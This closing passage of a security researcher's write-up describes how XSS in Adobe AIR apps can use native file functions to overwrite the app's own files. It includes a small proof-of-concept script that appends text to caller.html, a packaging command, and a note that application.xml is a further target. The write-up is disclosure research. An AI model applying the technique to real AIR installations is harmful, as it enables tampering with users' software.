 &amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* overwrite.js&lt;br /&gt;
 function remoteLoad(){&lt;br /&gt;
  var localFile = air.File.documentsDirectory;&lt;br /&gt;
  localFile = localFile.resolve(&amp;quot;/local/path/to/aip/resources/caller.html&amp;quot;);&lt;br /&gt;
  // i.e. on MacOS: /Applications/AIR-overwrite.air/Contents/Resources/caller.html&lt;br /&gt;
  var localFileStream = new air.FileStream();&lt;br /&gt;
  localFileStream.open(localFile, air.FileMode.APPEND);&lt;br /&gt;
  localFileStream.writeUTFBytes(&amp;quot;data from remote&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
To compile, the AIR SDK must be installed (beside the actual&lt;br /&gt;
runtime). The bin of the SDK dir contains ADT, a command-line tool to&lt;br /&gt;
generate AIR files:&lt;br /&gt;
 $ adt -package AIR-overwrite.air App.xml AIRAliases.js caller.html&lt;br /&gt;
&lt;br /&gt;
After installing and running AIR-overwrite.app, &amp;quot;data from remote&amp;quot; is appended to caller.html. Another interesting point for overwriting inside AIR apps could be META-INF/application.xml which contains the pointers to the resources or certificates.&lt;br /&gt;
&lt;br /&gt;
The example is kinda lame. With such remote access much fancier stuff is imaginable. But what I found somehow funny is the fact that AIR doesn't have any mechanism to recognize changes to its own files.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Conclusion&lt;br /&gt;
Macromedia/Adobe Flash has a long history of bad or no security, so AIR seems to stay in that long tradition. By introducing those PNDF (&amp;quot;Potentially Dangerous Native Functions&amp;quot; - thanks to Wisec for making up this term :) Adobe opens new vectors XSS can cause. Stuff like SameOrigin policies and access restrictions are there for a very&lt;br /&gt;
good and known reason. Adobe seem to know about the security implications as they describe in their developer docs, but nonetheless it doesn't makes it any better from my point of view.&lt;br /&gt;
&lt;br /&gt;
There are already some real world services/sites offering AIR where exploitation works the way described.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*  URLs:&lt;br /&gt;
** AIR installer http://labs.adobe.com/downloads/air.html&lt;br /&gt;
** AIR SDK http://labs.adobe.com/downloads/airsdk.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  fukami ([http://sektioneins.de SektionEins] / [http://fukami.vakuum.net personal weblog])&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	</feed>